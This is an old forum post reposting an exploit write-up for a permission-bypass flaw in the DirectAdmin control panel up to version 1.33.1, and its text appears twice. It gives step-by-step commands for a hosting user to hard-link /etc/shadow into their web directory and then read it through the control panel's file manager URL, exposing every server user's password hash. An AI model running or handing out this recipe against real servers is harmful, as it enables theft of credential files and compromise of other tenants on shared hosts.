guerra
03-26-2009, 04:39 PM
DirectAdmin <= 1.33.1 Permission Bypass UID=\"0\"
Auther : watchdog
Home : http://security-shell.ws
.....................................
As known that the DirectAdmin Control Panel is better than Cpanel ..
But this is a vuln on it .. 0-day
First :
Exploiter should execute any command on the host .. use the \'ln\' command for make a symbolic link
example :
In The root path => /home/attackeruser/domains/attackersite.com/public_html/
Execute :
ln /etc/shadow
After that Go to The Control Panel
https://attackersite.com:2222/CMD_FILE_MANAGER/domains/attackersite.com/public_html/shadow
Its now should be the same as attackersite.com Permission
You can read the shadow and see all server users hashs
Also its runs on the other users of server ..
Auther : watchdog
Home : http://security-shell.ws
.....................................
As known that the DirectAdmin Control Panel is better than Cpanel ..
But this is a vuln on it .. 0-day
First :
Exploiter should execute any command on the host .. use the \'ln\' command for make a symbolic link
example :
In The root path => /home/attackeruser/domains/attackersite.com/public_html/
Execute :
ln /etc/shadow
After that Go to The Control Panel
https://attackersite.com:2222/CMD_FILE_MANAGER/domains/attackersite.com/public_html/shadow
Its now should be the same as attackersite.com Permission
You can read the shadow and see all server users hashs
Also its runs on the other users of server ..